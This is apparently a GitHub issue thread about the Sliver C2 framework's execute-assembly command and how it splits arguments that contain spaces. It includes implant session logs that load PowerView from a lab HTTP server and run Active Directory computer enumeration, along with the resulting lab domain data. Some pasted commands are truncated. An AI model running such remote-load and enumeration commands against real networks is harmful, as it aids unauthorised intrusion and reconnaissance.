improve execute-assembly cli parsing ux

[senzee1984]

Describe the bug If the parameter of the program to be executed contains any space, command execute-assembly will parse it as a new parameter.

To Reproduce Steps to reproduce the behavior:

1. Use execute-assembly to execute a .NET assembly program and provide parameters of the program
2. The program powersharp.exe accepts two parameter, the 1st is the module to load, the 2nd is the cmdlet to execute
3. The command execute-assembly powersharp.exe "/m:http://192.168.0.44:81/powerview.ps1" "/c:get-netcomputer -identity web01". It means, load powerview remotely and execute get-netcomputer -identity web01 cmdlet.
4. It displays all net computers. After debugging, I find that -identity is regarded as the 3rd parameter, and web01 is regarded as the 4th parameters.

[server] sliver (SMOGGY_CREATURE) > execute-assembly powersharp.exe "/m:http://192.168.0.44:81/powerview.ps1" "/c:get-netcomputer -identity web01"

[*] Output:
4
/m:http://192.168.0.44:81/powerview.ps1
/c:get-netcomputer
-identity
web01
Usage: powersharp.exe "/m:<Module>" "/c:<cmdlet>"
Import a remote module and execute a cmdlet: powersharp.exe "/m:.\powerview.ps1" "/c:Get-NetComputer | select dnshostname" 
Import a local module and execute a cmdlet: powersharp.exe "/m:http://192.168.1.100/powerview.ps1'  "/c:Get-NetComputer | select dnshostname" 
Execute a cmdlet without importing a module: powersharp.exe "/m:" '/c:Get-Process" 
Import a module without executing a cmdlet: powersharp.exe "/m:http://192.168.1.100/shell"  "/c:" 
Recommend to minimize required output by ultilizing "select" 

Expected behavior Only web01's computer information will be displayed, like this:

@{logoncount=68; badpasswordtime=12/31/1600 4:00:00 PM; distinguishedname=CN=WEB01,OU=Web Server,DC=child,DC=htb,DC=local; objectclass=System.DirectoryServices.ResultPropertyValueCollection; badpwdcount=0; lastlogontimestamp=10/13/2022 6:42:35 PM; objectsid=S-1-5-21-2749819870-3967162335-1946002573-1104; samaccountname=WEB01$; localpolicyflags=0; codepage=0; samaccounttype=MACHINE_ACCOUNT; countrycode=0; cn=WEB01; accountexpires=NEVER; whenchanged=10/14/2022 7:43:27 PM; instancetype=4; usncreated=12967; objectguid=42a18d8b-8d41-4118-b7a4-555f322ed7b8; operatingsystem=Windows Server 2019 Datacenter Evaluation; operatingsystemversion=10.0 (17763); lastlogoff=12/31/1600 4:00:00 PM; msds-allowedtodelegateto=System.DirectoryServices.ResultPropertyValueCollection; objectcategory=CN=Computer,CN=Schema,CN=Configuration,DC=htb,DC=local; dscorepropagationdata=System.DirectoryServices.ResultPropertyValueCollection; serviceprincipalname=System.DirectoryServices.ResultPropertyValueCollection; lastlogon=10/16/2022 9:49:59 AM; iscriticalsystemobject=False; usnchanged=35951; useraccountcontrol=WORKSTATION_TRUST_ACCOUNT, TRUSTED_TO_AUTH_FOR_DELEGATION; whencreated=9/14/2022 1:18:27 AM; primarygroupid=515; pwdlastset=10/14/2022 12:43:27 PM; msds-supportedencryptiontypes=28; name=WEB01; dnshostname=web01.red.local}

Desktop (please complete the following information):

• OS: Kali Linux 2022
• Version v1.5.27

Additional context For debugging purpose, I printed all parameters at the beginning of the output.

            Console.WriteLine(args.Length);
            for (int i = 0; i < args.Length; i++)
            {
                Console.WriteLine(args[i]);
            }

[moloch--]

Try

execute-assembly powersharp.exe -- "/m:http://192.168.0.44:81/powerview.ps1" "/c:get-netcomputer -identity web01"

Same results?

[senzee1984]

Try

execute-assembly powersharp.exe -- "/m:http://192.168.0.44:81/powerview.ps1" "/c:get-netcomputer -identity web01"

Same results?

Thanks for your quick response! Yes, still the issue

[server] sliver (SMOGGY_CREATURE) > execute-assembly  powersharp.exe -- "/m:http://192.168.0.44:81/poweretcomputer -identity web01" 

[*] Output:
5
--
/m:http://192.168.0.44:81/powerview.ps1;
/c:get-netcomputer
-identity
web01
Usage: powersharp.exe "/m:<Module>" "/c:<cmdlet>"
Import a remote module and execute a cmdlet: powersharp.exe "/m:.\powerview.ps1" "/c:Get-NetComputer | select dns
Import a local module and execute a cmdlet: powersharp.exe "/m:http://192.168.1.100/powerview.ps1'  "/c:Get-NetCoostname" 
Execute a cmdlet without importing a module: powersharp.exe "/m:" '/c:Get-Process" 
Import a module without executing a cmdlet: powersharp.exe "/m:http://192.168.1.100/shell"  "/c:" 
Recommend to minimize required output by ultilizing "select" 

[moloch--]

Oh you know what, it's probably a nested encoding issue, it's a little un-intuitive but I think* this will work:

execute-assembly  powersharp.exe -- \"/m:http://192.168.0.44:81/poweretcomputer -identity web01\"

[senzee1984]

Oh you know what, it's probably a nested encoding issue, it's a little un-intuitive but I think* this will work:

execute-assembly  powersharp.exe -- \"/m:http://192.168.0.44:81/poweretcomputer -identity web01\"

Thanks, this works partially, but -- is parsed as a parameter.

[server] sliver (SMOGGY_CREATURE) > execute-assembly  /opt/red/powersharp.exe -- \"/m:http://192.168.0.44:81/powerview.ps1\" \"/c:get-netcomputer -identity web01\" 

[*] Output:
3
--
/m:http://192.168.0.44:81/powerview.ps1
/c:get-netcomputer -identity web01
Usage: powersharp.exe "/m:<Module>" "/c:<cmdlet>"
Import a remote module and execute a cmdlet: powersharp.exe "/m:.\powerview.ps1" "/c:Get-NetComputer | select dnshostname" 
Import a local module and execute a cmdlet: powersharp.exe "/m:http://192.168.1.100/powerview.ps1'  "/c:Get-NetComputer | select dnshostname" 
Execute a cmdlet without importing a module: powersharp.exe "/m:" '/c:Get-Process" 
Import a module without executing a cmdlet: powersharp.exe "/m:http://192.168.1.100/shell"  "/c:" 
Recommend to minimize required output by ultilizing "select"

[moloch--]

Yea that should go here, to appease the grumble parser:

execute-assembly  -- /opt/red/powersharp.exe \"/m:http://192.168.0.44:81/powerview.ps1\" \"/c:get-netcomputer -identity web01\" 

[senzee1984]

Yea that should go here, to appease the grumble parser:

execute-assembly  -- /opt/red/powersharp.exe \"/m:http://192.168.0.44:81/powerview.ps1\" \"/c:get-netcomputer -identity web01\" 

I modified source code of powersharp to accept -- as the first parameter.

            else if (param == 3) //Parameter verification in Sliver's execute-assembly: parameter1 must be "--", parameter2 must start with "/m:", parameter3 must start with "/c:".
            {
                String arg1 = args[0].ToString();
                String arg2 = args[1].ToString();
                String arg3 = args[2].ToString();
                if (!arg1.Substring(0, 2).Contains("--") || !arg2.Substring(0, 3).Contains("/m:") || !arg3.Substring(0, 3).Contains("/c:"))
                {
                    Console.WriteLine("The 1st parameter should be --, the 2nd parameter should start with \"/m:\", the 3rd parameter should start with \"/c:\"\n");
                    Display();
                    return;
                }
            }

And now the execution is successful.

[server] sliver (SMOGGY_CREATURE) > execute-assembly  /opt/red/powersharp.exe --- \"/m:http://192.168.0.44:81/powerview.ps1\" \"/c:get-netcomputer |select dnshostname\" 

[*] Output:
@{dnshostname=dc01.child.htb.local}

@{dnshostname=web01.child.htb.local}

@{dnshostname=srv01.child.htb.local}

@{dnshostname=srv02.child.htb.local}

@{dnshostname=my.child.htb.local}

Greatly appreciate if execute-assembly can parse parameters corrently by itself, just like CobaltStrike : D Keep good work, Sliver has great potential!

[moloch--]

The behavior is the result layering cli parsers as described here on the wiki, its working as intended. Sliver's commands are just structured differently, we'd have to modify our upstream REPL library to change this, which we don't really want to do.